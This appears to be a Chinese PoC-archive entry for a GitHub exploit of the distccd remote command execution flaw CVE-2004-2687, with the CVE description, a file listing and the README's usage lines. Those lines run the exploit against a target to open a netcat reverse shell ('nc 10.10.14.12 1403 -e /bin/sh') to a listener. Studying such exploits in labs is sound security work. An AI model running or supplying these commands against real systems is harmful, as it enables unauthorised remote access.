POC详情: 877901f771db856a075b4dd5dd326c5fe045e07e

来源
https://github.com/n3ov4n1sh/distccd_rce_CVE-2004-2687
关联漏洞
标题: Apple Xcode Tools 配置错误漏洞 (CVE-2004-2687)
描述:用于XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制时,远程攻击者可以借助编辑工作执行任意命令,该漏洞被无授权检查的服务器执行。
介绍
# distccd_rce_CVE-2004-2687

🖥️ -k4u5h41-
#️⃣ CVE-2004-2687
#️⃣ This is a Python 2 script and #️⃣ tested on kali 2021.2

	nc -lvp 1403
	python2 distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.12 1403 -e /bin/sh"

Vulnerability :

![image](https://user-images.githubusercontent.com/66146701/124954485-9916f480-dfc2-11eb-8623-3b802610200b.png)

Exploit :

![image](https://user-images.githubusercontent.com/66146701/124954625-c19eee80-dfc2-11eb-99e8-f3519a063ce7.png)

![image](https://user-images.githubusercontent.com/66146701/124954677-cd8ab080-dfc2-11eb-9239-bd2c152f6902.png)
文件快照

 [4.0K]  /data/pocs/877901f771db856a075b4dd5dd326c5fe045e07e
├── [2.4K]  distccd_rce_CVE-2004-2687.py
└── [ 615]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。